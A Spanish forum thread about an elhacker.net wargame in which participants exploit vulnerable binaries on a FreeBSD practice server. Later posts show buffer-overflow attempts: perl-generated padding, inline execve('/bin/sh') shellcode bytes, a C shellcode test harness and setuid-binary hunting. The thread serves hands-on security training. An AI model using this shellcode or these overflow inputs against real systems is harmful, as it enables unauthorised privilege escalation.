http://warzone.elhacker.net/blog/2008/11/torneo-de-explotacion-de-servidores.html
CitarPara obtener sus datos de inicio de sesion al servidor, deben acceder a..
http://warzone.elhacker.net/wzon.php
Ahi mismo meten los datos de lo de confirmacion que les da el mismo server cuando terminan el torneo.
Saludos!!
Citar> NO USAR SCANNERS DE VULNERABILIDADES WEB o se les baneara del servidor por flood.
> Si hacen un scan con nmap, el resultado sera el puerto 80 abierto, y el SO FreeBSD.. NO HAY MAS PUERTOS ABIERTOS.
> Se les da una shell a todos los participantes en el servidor, LA PRIMERA PARTE DE LA PRUEBA ES ENCONTRARLA.
Torneo de explotacion de servidores Sabemos que muchos de ustedes querian explotar vulnerabilidades en aplicaciones binarias, como buffer overflows, heap overflows, etc..asi tambien nos han pedido pruebas de vulnerar un servidor.
En fin, creemos eso es una buena idea, pero no podemos montar tales pruebas en un servidor nuestro por seguridad, y no lo podemos virtualizar, por rendimiento.. asi que Anon organizara un wargame de este tipo, y le pedi que si podia hacernos el favor de organizarlo para los usuarios de warzone, y dijo que si! entonces..
El dia Sabado 29 de Noviembre del 2008 a media noche, horario GMT (Meridiano de Greenwich/Casablanca), Viernes 28 a las 6:00 pm en la ciudad de mexico (GMT-6), Viernes 28 a las 9:00pm en Buenos Aires (GMT-3), Sabado 29 a la 1:00 am en Madrid (GMT+1), se publicara en warzone una prueba en la cual los usuarios podran obtener la direccion del wargame, junto con sus datos de inicio de sesion.
El objetivo sera ir pasando desde 4 niveles, explotando vulnerabilidades en los ejecutables dentro del mismo, permisos, etcetera.
Los primeros 5 que pasen la prueba, se les daran 30 puntos en warzone, asi como una promocion de 2 rangos (maximo rango: elite, los que ya esten en elite, pasaran a nightmare.), una cuenta de correo @elhacker.net, asi como acceso a todos sus servicios.
Los siguientes 5, recibiran 15 puntos en warzone, una promocion de 1 rango (no podran pasar a nightmare, los elite).
Todos los demas que pasen la prueba, tendran 10 puntos en warzone, sin promocion de rango.
Hay bonos:
> Modificar el MOTD agregando su nick.
- 20 puntos
> Menor tiempo en pasarlo
- 15 puntos
> Mejor documentacion de como pasarlo*
- 15 puntos (+ cuenta @elhacker.net si no la tienen ya)
* Esta debe ser enviada de forma privada, se le daran los creditos al autor.
> Posiblemente mas, dependiendo de como se desenvuelva el torneo.
El wargame estara online 10 dias, pero podria estar mas tiempo.
En fin, esperamos contar con su presencia! les prometo sera divertido.. mas detalles de la prueba se colocaran en cuanto se acerque la fecha.
Saludos!!
Para los que no saben que es warzone:
http://warzone.elhacker.net/
Saludos!!
Bueniisimo, voy a tratar de hacer algo ^^, btw, habra cosas a nivel web?
no, para cosas a nivel web, ya existen muchas pruebas en warzone..
AH ok, de lo otro no se casi nada ^^
aver si entendi bien , seria explotacion a nivel Bof , Hof , a aplicaciones de tipo servidor?
Si mas o menos, se les dara una cuenta con pocos privilegios en un sistema, podran entrar y ir explotando aplicaciones con esos tipos de errores, y tal vez intentar hackear el sistema.
Saludos.
uy esto mola, el server k sera linux, windows o ambos?? o distinto?? ejkej
Eso esta por decidirse todavia :rolleyes:, lo sabran cuando se conecten.
Saludos.
interesante :), gracias anon
Cita de: Anon en 16 Noviembre 2008, 14:55 PM
Eso esta por decidirse todavia :rolleyes:, lo sabran cuando se conecten.
Saludos.
jajaja que mala onda..
ES WINDOWS 3.1!! (no no es cierto.. )
Saludos
Diosss.. gracias por escuchar mis PLEGARIAS...!!!
por fin sacan un reto de este tipo...!! xD
lo ideal seria montar 2 servers uno con Gnu Linux y otro con Windows.. a ver que SO cae primero...
oPen syLar, se hara otro torneo con un servidor windows despues (y con 20 niveles, aunque sera diferente), pero eso se publicara hasta la proxima semana.
Se documentaran las intruisiones :D? eso seria de gran interes entre algunos de nosotros :D
Cuales Instrucciones. ? las del torneo.
Bueno, se realizar un texto diciendo de que se trata a grandes rasgos, Cuantos retos Habra. y que hacer despues de pasar retos Individuales y todos los retos.
Saludos.
intrusiones != instrucciones
:xD xDDDDDDDDD :xD
intruisiones != intrusiones != instrucciones
Cita de: Azielito en 18 Noviembre 2008, 18:35 PM
Se documentaran las intruisiones
RE-xD
jaja. si que hacen falta clases de Ortografia y lectura xD.
Si sirdarckcat va dar puntos quien entrege la mejor Documentacion de como pasarlo.
Genial! Ya era necesario un reto como este!! Ya estoy harto de xss, rfi, lfi, etc!
Tengo muchas ganas :D
Los resultados del torneo los van a postear..??
Estaria muy bueno que lo hagan..!!!!
Lo que podriais es mandar unos "apuntes" para ir estudiando hasta que llegue el dia.
unos links, etc :P.
Cita de: PaPeRrO en 19 Noviembre 2008, 15:55 PM
Lo que podriais es mandar unos "apuntes" para ir estudiando hasta que llegue el dia.
unos links, etc :P.
pueden estudiar de BoF/HoF, en el foro de bugs y exploits, Anon puso un tut que les servira..
Cita de: NewLog en 19 Noviembre 2008, 12:04 PM
Genial! Ya era necesario un reto como este!! Ya estoy harto de xss, rfi, lfi, etc!
Tengo muchas ganas :D
No hay RFI ni LFI en warzone.. (bueno de hecho si, pero la prueba esta en un rango privado)
Cita de: Salteño en 19 Noviembre 2008, 15:53 PM
Los resultados del torneo los van a postear..??
Estaria muy bueno que lo hagan..!!!!
si
Jejeje, qué desliz! Ya me imagino que no habrán vulnerabilidades que permitan acceder al sistema por lo mismo que has comentado en el primer post ^^
Me refería a que ya estoy cansado de vulnerabilidades a nivel web!
Cita de: NewLog en 20 Noviembre 2008, 08:32 AM
Jejeje, qué desliz! Ya me imagino que no habrán vulnerabilidades que permitan acceder al sistema por lo mismo que has comentado en el primer post ^^
Bueno de hecho se va a tener pleno acceso al sistema, aunque algo restringido.
Cita de: sirdarckcat en 15 Noviembre 2008, 17:24 PM
> Modificar el MOTD agregando su nick.
- 20 puntos
Esta abierta la propuesta de que se desvien del objetivo o mas aun pasarlos todos, y despues de eso tratar de rootear el server xD.
got root?
o sea, preguntaba que si se haran publicos los logs, tecnicas de "los intrusos" :D
asi aprenderemos todos ñ_ñ
mmmmmm pues puede ser.. que opinas Anon? publicar los bash_history..
Bien, si se publicaran!!
Saludos.
En lugar de darles documentacion que deban leer les dare lo contrario.
Documentacion que NO deben leer:
Documentacion para NO LEER sobre SSH:
http://www.kb.cert.org/vuls/id/395412
http://www.webappsec.org/lists/websecurity/archive/2006-05/msg00053.html
Documentacion para NO LEER sobre Windows:
http://www.kb.cert.org/vuls/id/953860
http://www.securiteam.com/tools/5MP052KI0A.html
Documentacion para NO LEER sobre SSH y Windows:
http://www.securityfocus.com/bid/26939
http://www.acunetix.com/vulnerabilities/PHP.exe-Windows-CGI-for-A.htm
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=743
Documentacion para NO LEER sobre FreeBSD:
http://www.freebsd.org/cgi/query-pr-summary.cgi?category=&severity=&priority=&class=&state=&sort=none&text=&responsible=&multitext=&originator=&release=
http://www.freebsd.org/security/advisories.html
http://news.ninemsn.com.au/article.aspx?id=665847
http://www.webturkiyeportal.com/webforum/126883-herkes-icin-c.html
Documentacion para NO LEER sobre SSH y FreeBSD:
http://www.freebsd.org/doc/en/books/handbook/network-apache.html
http://bsdportal.ru/viewtopic.php?t=17385
http://www.freebsdsoftware.org/www/p5-FCGI-Spawn.html
http://community.itbbs.cn/showthread.php?t=8203
Documentacion para NO LEER sobre Linux:
http://secunia.com/advisories/26934/
http://www.linux.org.tw/CLDP/OLD/Chinese-HOWTO-4.html#ss4.4
http://secunia.com/advisories/10151/
http://www.proz.com/forum/turkish/119933-%C3%87eviri_at%C3%B6lyesi_e%C4%9Fitimleri_ba%C5%9Fl%C4%B1yor.html
Documentacion para NO LEER sobre SSH y Linux:
http://www.frsirt.com/english/advisories/2007/1879
http://forum.synthesis.ch/showthread.php?t=654
http://listweb.bilkent.edu.tr/Linux/linux/2002/Jul/1183.html
http://www.apache-mod-rewrite.fr/verification-installation-mod-rewrite
http://wiki.ubuntu.hk/w/Virtual_hosting_with_Apache#Debian_GNU.2FLinux_.E7.9A.84_Apache2_.282.0.x.29
Si encuentro mas les aviso
Saludos!!
Gracias SDC :D
Ahora mismo me pongo a NO leer...
Perfecto, sabiendo que cosas NO hay que leer, pueden ya ir estudiando!!!
Faltan 5 Dias. asi que no se atrasen. Ya que no hay mucho tiempo que perder.
Uniciara el Torneo, se les dara la Direccion, Se conectan Instantaneamente y a codear y vulnerar el server.
:rolleyes: :xD Saludos y Suerte.
Buenas!
Soy nuevo en la comunidad... nada decir que me parecen muy interesantes los wargames y que estoy aprendiendo mucho por aqui, este de explotacion de servidores suena muy interesante!
A esperar al sabado para probar :P
Bien, solo el comentario de que deben de tener cuenta creada en warzone.
Saludos y Suerte.
quiero q me digan q tipos de programa me ayudara para poder concursar.!!!!!
Vale, pues espero nos de tiempo para apoyar , ayudar y asi mismo divertirnos un rato...
-berz3k.
Ya falta menos para la 1 am del sabado :P!!!
Se sabe algo sobre que tipo de servidor sera??
Faltan menos de 12 Hrs.. Preparen sus terminales sus clientes, sus codigos. que esto va ha ser un verdadero maraton.
Cita de: szemog en 28 Noviembre 2008, 13:23 PM
Se sabe algo sobre que tipo de servidor sera??
;) Descubrelo cuando de conectes :xD
ya lo viiiiii!! es windowssssssssssssssssssssssssssssssssssssssssss
aunque dudo que logren encontrar como iniciar sesion mas del 10%
ahhh, para que les arruinas la sorpresaaaaaaaaaaaa
;D bueno revelado el secreto, ya sabran donde estudiar!! y ojo que no es la sección de NO Leer que puso Sirdarckcat. :rolleyes:
Saludos :xD
jasjajajaj me temia q fuera win xD wen aer q se puede hacer por intentar...
Gracias x poner lo de menos de 12h, no se como pero entendi que era mañana a la 1
Cita de: szemog en 28 Noviembre 2008, 22:00 PM
jasjajajaj me temia q fuera win xD wen aer q se puede hacer por intentar...
:laugh: Que mas le hacemos :rolleyes: :xD
Cita de: szemog en 28 Noviembre 2008, 22:00 PM
Gracias x poner lo de menos de 12h, no se como pero entendi que era mañana a la 1
aaa Suele a ver confuciones por un evento asi. Igual ya solo faltan 3 Hr...
Cita de: t3nsh1sensei en 25 Noviembre 2008, 04:58 AM
quiero q me digan q tipos de programa me ayudara para poder concursar.!!!!!
Internet Explorer claro esta, y no olvides Instalar Filezilla tal vez lo necesites. ^^
Da por comenzado en Torneo Oficialmente.
Suerte a todos y gracias por su Interes.
es esto normal?
Forbidden
You don't have permission to access /shell.php on this server.
:o...mmm... si es normal.
:rolleyes: :rolleyes:
Cita de: sirdarckcat en 28 Noviembre 2008, 16:31 PM
aunque dudo que logren encontrar como iniciar sesion mas del 10%
CitarForbidden
You don't have permission to access /shell.php on this server.
Era de esperarse :P
Para obtener sus datos de inicio de sesion al servidor, deben acceder a..
http://warzone.elhacker.net/wzon.php
Ahi mismo meten los datos de lo de confirmacion que les da el mismo server cuando terminan el torneo.
Saludos!!
Para a quellos que usen escaners de vulnerabilidades Web o un force brute al web seran se les negara el acceso de momento.
La cosa no va por ahi, el escaner no les va a arrojar Absolutamente nada.
Saludos.
Citarya lo viiiiii!! es windowssssssssssssssssssssssssssssssssssssssssss
aunque dudo que logren encontrar como iniciar sesion mas del 10%
Yo pensaba que era bsd pero bueno, supongo que verificar los puertos tampoco hace daño no? el netcat me arrojó todos los puertos abiertos XD asi que tube que usar el nmap mejor y no encontré nada jajajaja no voy a decir como intenté entrar para que lo intenten también los demás :P pero de todas las maneras que traté no pude.
Supongo que esto va de buena forma y no de mala verdad? por algo dieron user y pass, supongo que de entrada no hay que explotar nada como la falla de los win server o un rpcdcom :rolleyes:.
Si la falla no va a nivel web supongo que la vulnerabilidad del php que tiene no tiene nada que ver :P
Que rabia, con las ganas que tenía de entrar, suponiendo que es win sería mas fácil.
Si esto va por la manera legal, solo que la puerta esta escondida.
Saludos.
¿No hay pistas?
Si no me dan pistas yo "exploto" el servidor a mi manera:
(http://www.subaquatica.com/images/RVLSTAK2.jpg)
Yo me sigo dando contra una pared, la puerta no la encuentro :xD, y ahora que lo pienso Sirdarckcat, solo el 10%? apuesto a que más se quedan sin entrar :-X
Ya estoy dentro desde ayer XD, pero eso es la primera parte, cuando estes dentro te daras cuenta que apenas empieza esto..
-berz3k.
@Anon
Esta muy raro todo, platicando con sdc esta algo incomodo jugar XDD , el primer BoF aveces funciona y aveces se frezzea no entiendo..
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????°1I?%A1A°↨I?1U1A°↨I?ë▼^%1A%F♀^F°♂%ó??V♀I?1U%O@I?èÜ ÿÿ/bin/shDè¿¿Dè¿¿
Bad system call
C:/Users/root/Desktop
La cosa va bien :D
Disculpen las molestias tecnicas, si a alguien no se le dejo entrar la hora anterior.
Fue culpa del ISP. que de porsi no dejo hacerlo todo como esta planeado desde el principio. verdad sdc???
Este... Pues seria combeniente que antes de trartar de explotar el bof.
Se pruebe si el shellcode Funciona bien en el sistema. Ya saben a que me refiero.
Ya que ese Bad System Call me suena que no va todo bien.
En fin suerte a todos.
Saludos.
Efectivamente no estas usando el shellcode correcto.
Lo probe mandandolo solo a ejecutar:
int main() {
void (*run)()=(void *)shellcode;
printf("%d bytes \n",strlen(shellcode));
run();
return 0;
}
%gcc testsh.c -o testsh
%./testsh
65 bytes
Bad system call
Busca alguno de los shellcode que he puesto yo.
Saludos.
Cita de: Carloswaldo en 29 Noviembre 2008, 13:49 PM¿No hay pistas?
Seh, NO ES VULNERABILIDAD NIVEL WEB.
Solo hay 1 puerto abierto en el servidor.
La primera parte del reto es encontrar la shell.
lalala..
Ya entré.
CitarMas facil no se puede xD
Se esperaban Parametros!!
Uso:
%s <algo>
Usted paso como parametro lo siguiente:
%s
calloc(): %s
Esto me recuerda y si es que no me equivoco debe ser el mismo, la prueba que hicieron hace tiempo en la sección de wargames donde alguien prestó su servidor con el mismo sistema donde estamos ahora y al parecer con el mismo programa y con la misma falla :P solo que la shell no es una shell sino que es un pipe a quien sabe donde.
De todas formas intenté:
Citarsh ./validar `perl -e 'print "?" x 1036'`
aunque en checker y BoF me dió lo mismo: nada.
No soy tan bueno para los bof como berz3k :P
PD: hacen mas de 30 grados de calor y me duele la cabeza a mares :-\
PD2: Busqué en los post anteriores del foro de wargames hasta la última página y ya no está :huh: supongo que no lo movieron/borraron apropósito vdd?
:D bien.
No no se ha borrado, y no esta en wargames.
Saludos.
Citar$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $ Adv
ertencia "/usr/home/warzone/validar"
Solo puede ser ejecutado 10 veces por Usted
Esta vez no cuenta solo le informa el uso:
Debera ejecutarlo usando path absoluto o relativo
da igual esto es asu gusto.
Se le pedira el hash del reto N, donde N el ultimo reto que ha Ejecutado
Esto es por seguridad y para evitar un ForceBrute.
Note que cada vez que ejecute los programas vulnerables se va
a generar un Hash Aleatorio
Saludos y Suerte.
Anon.
/usr/home/warzone/.db/count_ /usr/home/warzone/.db/reto_ %s%d r+ %s w fopen():
%s r Usted no a ejecutado ningun Reto!
No cuenta esta ejecucion Ejecutado: %d
Hash de la Prueba %d: Perfecto ;) /usr/home/warzone/.db/grupos %d %d %d No
es Igual!! ;( Lo sentimos ya ha sobrepaso el limite de Ejecuciones!!
Guadar calloc(): %s $FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:3
\♦ $♣ á♠ Óü♦ ¶á┤î ☺ § ♀ îà♦
Como es que puedo ejecutarlo solo 10 veces si cuando lo ejecuto me da errores
Citarsh ./validar
‼4: not found
⌂ELF☺☺☺: not found
./validar: 4: Syntax error: "(" unexpected (expecting ")")
No sabía que solo se podía ejecutar 10 veces :-s talves ya la jodí jajaja o talves se ejecute bién cuando logre pasar la primera parte no se pero bueno.
PD: Olvidalo ya se que pasó y estoy viendo lo de la shellcode.
Ya, me aburrí, mañana será otro dia :P
Citar./BoF `perl -e 'print "?" x 998'``../xxx/shellcode`
./BoF `perl -e 'print "?" x 1036'``../xxx/shellcode`
CitarSegmentation fault
Probé del 990 al 1070 para ver si me habia equibocado en el tamaño de la shellcode pero nada. y pruebo la shellcode y me lanza la shell pero al bolcar el buffer sobre el BoF no funciona. Para eso tube que modificar de la ejecución a printf guiandome por goodfellas (http://goodfellas.shellcode.com.ar/bsd.html).
Citar$ ./BoF `perl -e 'print "?" x 1035'``../xxx/shellcode`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$
Tampoco ..
Citar./BoF `perl -e 'print "?" x 1056 . "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh";'`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$
[/quote]
Tampoco, shaaaaaa :rolleyes:
Citar???????????????????????????????????????Ù↨[1└êCëëC♀PìRS░;P═ÇÞõ /bin/sh
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
chown: not found
chown: not found
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
¾Ý┐┐☺¯┐┐↕¯┐┐&¯┐┐N¯┐┐V¯┐┐c¯┐┐ǯ┐┐ø¯┐┐ª¯┐┐▓¯┐┐┐¯┐┐╦¯┐┐ί┐┐>´┐┐J´┐┐P´┐┐_´┐┐n´┐┐Ç´┐┐
ò´┐┐ª´┐┐
Segmentation fault
$
Warzone está caído? Ahora mismo no puedo acceder...
Si, no se ve pero la shell anda impecable porque no está dentro del servidor del wargame.
http://shell.wargame.elhacker.net/
Validar esta bien programado, ese no es uno de los ejecutables a atacar.
Si lo ejecutas con sh lo que estas haciendo es pasarle a sh como si validar fuera un archivo script.
Te marca los errores por que sencillamente estas tratando de jecutar un binario como shell script y no va.
En validar solo debes de poner el hash que obtines despues de haber explotado el bug.
Buscas un directorio Oculto dentro de donde se encuentra la aplicaion vulnerable y ahi hay un archivo que solo tu puedes leer ahi esta el hash que le tienes que meter en validar.
Despues de esto se te aplicara a otro grupo donde podras ver otro reto :P. Para esto tendras que volver a iniciar secion y validar con id la correcta aplicaion.
Creo que estas tratando de ejecutar el bug de una forma poco casual, si se puede con perl pero hace falta mas.
Pero al parecer ya lo vistes y solo lo aclaro para los demas, si busca una shellcode de las que he puesto, hay una muy bonita de 25 Bytes, en fin.
Saludos y Suerte.
$ /usr/home/warzone/validar
Ejecutado: 1
Hash de la Prueba 0: 413cdc2XXXXXXXXXXXXXXXXXX1
Perfecto ;)
pw: not found
$ echo $PATH
/sbin:/bin:/usr/sbin:/usr/bin:/usr/games:/usr/local/sbin:/usr/local/bin:/root/bin
$
esho es un bug de la aplicacion o q?
pw: not found
$ whereis pw
pw: /usr/sbin/pw /usr/share/man/man8/pw.8.gz /usr/src/usr.sbin/pw
$ ls -lah /usr/sbin/pw
-r-xr-xr-x 1 root wheel 54K Nov 21 16:15 /usr/sbin/pw
$
Lo probe muchas veces antes y si funciono... deja veo.
Saludos y gracias.
pues na... me voy a dormir :(
pense que os ibais a currar un jail, securelevels o algo asi....
El hacerlo en freebsd puede que haya limitado a muchos participantes.
Ya vi va a ser cosa del sh que estas ejecutando, trata que despues de genera el sh con el bug. Ya que viste tu hash
Sal del entorno inestable: yo lo probe
%/usr/home/warzone/validar
Ejecutado: 1
Hash de la Prueba 0: 88d32605000a5XXXXXX41f58da080889
Perfecto ;)
%
Y no salio error ... y con el entorno Inestable:
$ /usr/home/warzone/validar
Ejecutado: 3
Hash de la Prueba 0: 88d32605000a5XXXXXX41f58da080889
Perfecto ;)
pw: not found
$
Si, gracias voy a poner la observacion que regresen al shell principal.
Sobre lo otro que mencionas, si, sin embargo si no fuera asi, la verdad no seria un reto.
Ahora que no solo eso los limito, la mayoria no han encontrado como acceder al sistema.
Saludos.
Se agrego archivo TORNEO.txt dentro del directorio de Cada usuario
este contiene las Instrucciones de una manera general.
Saludos.
worale xD no sabia que dxr supiera de explotacion jaja..
se hizo en FreeBSD, porque en la vida real no siempre eliges el entorno en el que debes trabajar.. pero pues muy bn dxr, vas bien
lo de securelevels no creo hubiera sido muy util para este caso.. pero bueno, jail si.. pero amm.. una pesadilla de implementar en este caso, y con muchos usuarios, la memoria probablemente hubiera sido un problema..
Ahh porcierto, el lunes u algun dia cercano al lunes, es probable que les pongamos SSH o algo asi.. pero no es seguro.. depende de cuantos hayan ya descubierto como iniciar sesion.
Saludos!!
Hola, cuando entro en http://shell.warzone.elhacker.net/ no me carga la pagina, Safari dice que el servidor no responde, es como debería ser o me tendría que dejar hacer un login?
Nop no carga, ayer el servidor real del warzone también estaba off y como se veia la shell funcionando ps lo mas probable es que alguien esté lanzando algún ataque ddos.
Si es así lo mas probable también es que no tenga ni la mas minima idea de como entrar y por frustración la gente se desespera y comienza a hacer tonterías para sentirse tomados en cuenta.
(sugerencia) Sdc, podrías poner la web en un servidor ajeno a la shell y en ves de entrar que te de la ip del servidor con la shell real y asi evitas que un ataque al pedo proboque que no podamos entrar
la web esta en un servidor ajeno a la shell.. la shell esta en mexico, la web en españa, hay que esperar a que anon se de cuenta jaja.. porque no tengo su celular para avisarle (pasame tu cel!)
Saludos!!
Valla problema que no me di cuenta que no se podia entrar xD...,
No estuve todo el dia y por eso no me di cuenta hasta que llege. Esta ya esta disponible la pagina.
EL problema se dio hace como 12 hrs no se por que pero creo que tengo que reinicar el apache cada que la IP Cambia. o creo que eso fue...
Saludos...
@Anon
Que bueno hayas puesto un banner con las instrucciones, vaya que ya muchos conociamos algunos binarios vulenerabiles haciendo el "find / -perm", es casi como el primer paso en un auditoria Unix :D , pero muchos participantes no lo conocen, ademas es FreeBSD x86, como dice sdc no siempre tendras un Linux facil de explotar :D
Ta estoy en el 2do , a ver si tengo time en la semana
C:/Users/root/Desktop>./HoF
./HoF
fopen(): /tmp/input_7009: No such file or directory
-berz3k.
Citar
worale xD no sabia que dxr supiera de explotacion jaja..
Pues entonces ya me contaras... tando con la seguridad y luego no voy a saber de explotacion....
Citar
ademas es FreeBSD x86, como dice sdc no siempre tendras un Linux facil de explotar :D
Citar
se hizo en FreeBSD, porque en la vida real no siempre eliges el entorno en el que debes trabajar..
Por esa regla de 3, lo hubierais puesto en solaris.
Creo que lo del SO no es tan importante, pero el hacerlo por ssh era mejor, aunque solo sea para que muchos users vean como es una freebsd y trasteen un poco.
Podriais capar el netstat -an ;)
Bien, lo bueno que van avanzando, hay un archivo de instrucciones adicionales, para el 2 xD hay que buscarlo.
Recuerden que muchas veces no es necesario crear un sh, hay veces que puede ser Imposible, pero tambien hay veces que Modificando el varlor de una variable podemos seguir haciendo que la aplicacion se comporte de un modo distinto.
Saludos.
Cita de: dxr en 1 Diciembre 2008, 09:16 AMPues entonces ya me contaras... tando con la seguridad y luego no voy a saber de explotacion....
jaja hay mucha gente que solo habla y habla
Cita de: dxr en 1 Diciembre 2008, 09:16 AM
Por esa regla de 3, lo hubierais puesto en solaris.
y en symbian hubiera estado genial :xD
Cita de: dxr en 1 Diciembre 2008, 09:16 AM
Creo que lo del SO no es tan importante, pero el hacerlo por ssh era mejor, aunque solo sea para que muchos users vean como es una freebsd y trasteen un poco.
Podriais capar el netstat -an ;)
tambien ps, y /var/log/messages, pero.. nah :P, recuerda que hay bonus points.. ;)
ahh y porcierto.. ssh == algun dia
Saludos!!
Citary en symbian hubiera estado genial :xD
xDDDDDDDDDDDDDDDDDDDDDDDD
Pues si para entrar a la shell no hay que hacer nada de nivel web, no tengo ni pajolera idea e como conseguirla.
Bueno seguiré intentando pero soy completamente nuevo en temas de intrusión, así que nada sin mas un saludo.
Cita de: dxr en 1 Diciembre 2008, 23:33 PM
Citary en symbian hubiera estado genial :xD
xDDDDDDDDDDDDDDDDDDDDDDDD
La verdad pero que mas le hacemos xD...
Bueno, el ssh se implementara a mas tardar el miercoles.
Solo que estoy terminando unos scripts para realizar conteo de tiempo de los participantes.
Saludos y suerte.
CitarPodriais capar el netstat -an
+ Como dice sdc, /var/log
+ /tmp (no se porque ahi hay unos directorios que dicen imagenes y aparece uno con el nombre de sdc :huh:)
+ lo del netstat ya lo habia visto al igual que ifconfig y podías ver cuantas personas estaban conectadas viendo el puerto de conexión http(80).
+ /media (No tiene lectores o discos esclavos :( )
+ Hay unos juegos muy chidos para consola ;D podrías subirlos en un zip para jugarlos en local jaja.
En fin pero nada de explotación jajaja creo que no es mi fuerte, no todos tenemos el mismo tipo de conocimiento verdad? :P
Anon podrías habilitar el comando msg para conversar con los usuarios que estén dentro como se hizo la otra ves.
Saludos y suerte para el resto
(http://tbn0.google.com/images?q=tbn:sNh8RsjLObg87M:http://www.funman.com.au/media/Thumbs-Up.jpg)
Bueno los juegos de consola basados en Ncurses de momento no les funcionaran hasta que el ssh este habilidado.
netstat si lo voy a bloquar, pero /tmp es necesario para uno de los retos.
Ahora que media no es la carpeta donde en mi sistema monta los Lectores y particiones.
Ifconfig no creo que sea mucho problema.
Lo de los mensjaes lo habilitare junto con el ssh. De hecho ssh esta habilidado pero solo para mi xD...
Saludos.
El servidor está off nuevamente :rolleyes:
Cita de: Anon en 2 Diciembre 2008, 02:50 AM
De hecho ssh esta habilidado pero solo para mi xD...
falso! :xD
Cita de: sirdarckcat en 2 Diciembre 2008, 03:37 AM
falso! :xD
Este mmm.. si sdc tambien tiene acceso al ssh, pero solo para pruebas y un poco de administracion.
Saludos.
Me doy
(http://www.sergiosakall.com.br/tudo/chaves-quico1.jpg)
Cita de: Carloswaldo en 2 Diciembre 2008, 04:00 AM
Me doy
Vamos!! que pasa con esos animos??
Ya vez sdc, te dije que iban a sufrir...
Bueno, pronto esta disponible el ssh.
Saludos.
jajaja seh.. el objetivo era darle ventajas a los que se les ocurriera encontrar la shell :P
Saludos!!
Diosssssssss porfin la dichosa shell!!! Logre conectar :p solo me costo 3 dias :p
Despues de unos cuantos manuales y varias horas de google lo logre y ahora veo que no era tan complicado encontrar la shell, siempre hay una primera vez
chicos, cual era la url exacta de la shell?
shell.warzone.elhacker.net ??
Cita de: SoKe en 2 Diciembre 2008, 15:15 PM
chicos, cual era la url exacta de la shell?
shell.warzone.elhacker.net ??
Yep http://shell.warzone.elhacker.net/
Pero necesitas estar Registrado en warzone.
http://warzone.elhacker.net/
Cita de: szemog en 2 Diciembre 2008, 15:03 PM
Diosssssssss porfin la dichosa shell!!! Logre conectar :p solo me costo 3 dias :p
Despues de unos cuantos manuales y varias horas de google lo logre y ahora veo que no era tan complicado encontrar la shell, siempre hay una primera vez
Perfectisimo, ahora hay que empezar a ver sobre los comandos, ahi estan las instrucciones.
Adelante.
Saludos
cuanto tiempo va a estar abierto este torneo??
toy en periodo de preubas y luego vienen los examenes... y yo perdiendome esto...
saludos
Se penso Incialmente para 10 Dias, sin embargo y dependiendo del desarrollo del mismo, se puede extender un poco mas.
Saludos.
CitarSe penso Incialmente para 10 Dias, sin embargo y dependiendo del desarrollo del mismo, se puede extender un poco mas.
Así como va creo que habrán muy pocos ganadores o vas a tener extenderlo hasta enero pero del 2011 :xD
Cita de: WHK en 3 Diciembre 2008, 03:18 AM
Así como va creo que habrán muy pocos ganadores o vas a tener extenderlo hasta enero pero del 2011 :xD
:xD jajaja :laugh: :laugh: Creo que si :rolleyes:
Acepto Donaciones en Paypal!!
Broma!!
Vamos se que pueden.
De hecho cuando estan haciendo algo a nivel web, lo que ustedes mas esperarian es que el servidor ejeucten los comandos que ustedes quisieran, Y ahora tienen a su disposicion, la shell directamente que mas pueden pedir, bueno les dire que hay una forma de convertirse en root, esta un poco oculta, pero ahi esta.
Saludos.
Yo ni siquiera encuentro la forma de entrar... Bien puede ser porque no hay forma de hacer nada con esta conexion a internet de *****...
(90% de perdida de paquetes haciendo ping a shell.warzone.elhacker.net)
Al principio pense que seria cosa de la conexion del servidor de anon... hasta que vi que navegar por internet en general se me hacia pesadisimo, y que la misma respuesta a ping recibia de google, opendns etc.
...
Aun asi, no entiendo la pista, si solo hay un puerto abierto, es el puerto 80, y ademas se dice por ahi que el acceso esta abierto...
¿Me he hecho un lio con los comentarios en el foro? :-P
Cita de: sirdarckcat en 15 Noviembre 2008, 17:24 PM
http://warzone.elhacker.net/blog/2008/11/torneo-de-explotacion-de-servidores.html
CitarPara obtener sus datos de inicio de sesion al servidor, deben acceder a..
http://warzone.elhacker.net/wzon.php
Ahi mismo meten los datos de lo de confirmacion que les da el mismo server cuando terminan el torneo.
Saludos!!
Citar> NO USAR SCANNERS DE VULNERABILIDADES WEB o se les baneara del servidor por flood.
> Si hacen un scan con nmap, el resultado sera el puerto 80 abierto, y el SO FreeBSD.. NO HAY MAS PUERTOS ABIERTOS.
> Se les da una shell a todos los participantes en el servidor, LA PRIMERA PARTE DE LA PRUEBA ES ENCONTRARLA.
Si, el post es muy largo y confuso, Olvidate de que es windows ya se mencion que no lo es, si hay un solo puerto abierto es el 80, Has caso omiso del material de lectura NO Leer que puso sdc.
Si, al parecer tu conexión esta fallando, siempre existe un problema con el ISP. si se me hace ping perdere de momento y si acaso el 5% de los paquetes =( ---> ISP. Al menos que la cosa este totalmente off, la pagina no carga, pero el ping siempre responde.
Citar
Estadísticas de ping para 189.165.154.22:
Paquetes: enviados = 100, recibidos = 100, perdidos = 0
(0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
Mínimo = 29ms, Máximo = 549ms, Media = 58ms
:) ;D
Entonce ahora que!!
Bueno, pocos han podido entrar sdc acerto al decir que solo el 10%, a mas tardar en 12 Hrs se activara el ssh.
Mientras tanto pueden seguir intentando con la navaja suiza de TCP/IP :rolleyes: :rolleyes: ups creo que dije mucho!!
Saludos y suerte.
